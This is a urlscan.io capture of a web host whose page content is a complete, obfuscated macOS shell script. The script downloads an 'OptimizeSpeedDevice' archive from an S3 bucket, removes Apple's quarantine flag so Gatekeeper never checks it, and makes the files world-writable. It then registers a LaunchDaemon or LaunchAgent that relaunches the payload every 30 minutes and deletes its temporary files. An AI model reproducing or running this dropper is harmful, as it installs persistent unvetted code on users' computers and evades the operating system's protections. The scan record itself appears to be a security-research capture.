resource.bundleagent.com Open in urlscan Pro
3.221.211.235  Public Scan

URL: https://resource.bundleagent.com/
Submission: On February 19 via manual from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

HsKRIEUvIorQxPbWaEfU="com.optimize.speed.device"
bvUDZZfczXhUSielgKYZ="OptimizeSpeedDevice"
CSSHsqFJHaAuiectfICH="gmrjkbwpmyixegwmtgge"
oNuTAgTskqxTYgLAOrQT="/tmp/$CSSHsqFJHaAuiectfICH"
dFwGMcShBUayuZnvgyoY="OptimizeSpeedDevice"

if [ `id -u` = 0 ] ; then
	sIhqZQVHeAJDauLDAtgD="/Library/LaunchDaemons/$HsKRIEUvIorQxPbWaEfU.plist"
	PUSzbjczNoElNLFObsYw="/Library/Application Support/$bvUDZZfczXhUSielgKYZ"

	if [ ! -f "$sIhqZQVHeAJDauLDAtgD" ]; then

		mkdir -p "$PUSzbjczNoElNLFObsYw"

		curl --retry 5 -f "https://kaeqxczotdifgni.s3.amazonaws.com/$dFwGMcShBUayuZnvgyoY.zip" -o "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

		xattr -r -d com.apple.quarantine "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

		chmod -R 777 "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

		ditto -x -k "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip" "$PUSzbjczNoElNLFObsYw"

		xattr -r -d com.apple.quarantine "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY"

		chmod -R 777 "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY"

		mkdir -p "$oNuTAgTskqxTYgLAOrQT"

		touch "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"

		echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
		<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
		<plist version=\"1.0\">
			<dict>
				<key>Label</key>
				<string>$HsKRIEUvIorQxPbWaEfU</string>
				<key>Program</key>
				<string>$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY</string>
				<key>RunAtLoad</key>
				<true />
				<key>StartInterval</key>
				<integer>1800</integer>
			</dict>
		</plist>
		" > "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"

		chmod -R 777 "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"

		cp -f "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist" "$sIhqZQVHeAJDauLDAtgD"

		chmod -R 644 "$sIhqZQVHeAJDauLDAtgD"

		launchctl load -w "$sIhqZQVHeAJDauLDAtgD"

		rm -rf "$oNuTAgTskqxTYgLAOrQT"
		rm "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

	fi
else
	RWNGIYDH=$(ls -l /dev/console | awk '/ / { print $3 }')
	DHylOuwKNSVnPzVyUjRl=$(eval echo ~$(echo $RWNGIYDH))
	sIhqZQVHeAJDauLDAtgD="$DHylOuwKNSVnPzVyUjRl/Library/LaunchAgents/$HsKRIEUvIorQxPbWaEfU.plist"
	PUSzbjczNoElNLFObsYw="$DHylOuwKNSVnPzVyUjRl/Library/Application Support/$bvUDZZfczXhUSielgKYZ"

	if [ ! -f "$sIhqZQVHeAJDauLDAtgD" ]; then

		mkdir -p "$PUSzbjczNoElNLFObsYw"

		curl --retry 5 -f "https://kaeqxczotdifgni.s3.amazonaws.com/$dFwGMcShBUayuZnvgyoY.zip" -o "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

		xattr -r -d com.apple.quarantine "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

		chown -R $USER "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"	

		chmod -R 777 "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

		ditto -x -k "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip" "$PUSzbjczNoElNLFObsYw"

		xattr -r -d com.apple.quarantine "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY"

		chown -R $USER "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY"

		chmod -R 777 "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY"

		mkdir -p "$oNuTAgTskqxTYgLAOrQT"

		touch "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"

		echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
		<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
		<plist version=\"1.0\">
			<dict>
				<key>Label</key>
				<string>$HsKRIEUvIorQxPbWaEfU</string>
				<key>Program</key>
				<string>$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY</string>
				<key>RunAtLoad</key>
				<true />
				<key>StartInterval</key>
				<integer>1800</integer>
			</dict>
		</plist>
		" > "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"

		chown -R $USER "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"	

		chmod -R 777 "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist"

		cp -f "$oNuTAgTskqxTYgLAOrQT/$HsKRIEUvIorQxPbWaEfU.plist" "$sIhqZQVHeAJDauLDAtgD"

		chown -R $USER "$sIhqZQVHeAJDauLDAtgD"

		chmod -R 644 "$sIhqZQVHeAJDauLDAtgD"

		launchctl load -w "$sIhqZQVHeAJDauLDAtgD"

		rm -rf "$oNuTAgTskqxTYgLAOrQT"
		rm "$PUSzbjczNoElNLFObsYw/$dFwGMcShBUayuZnvgyoY.zip"

	fi
fi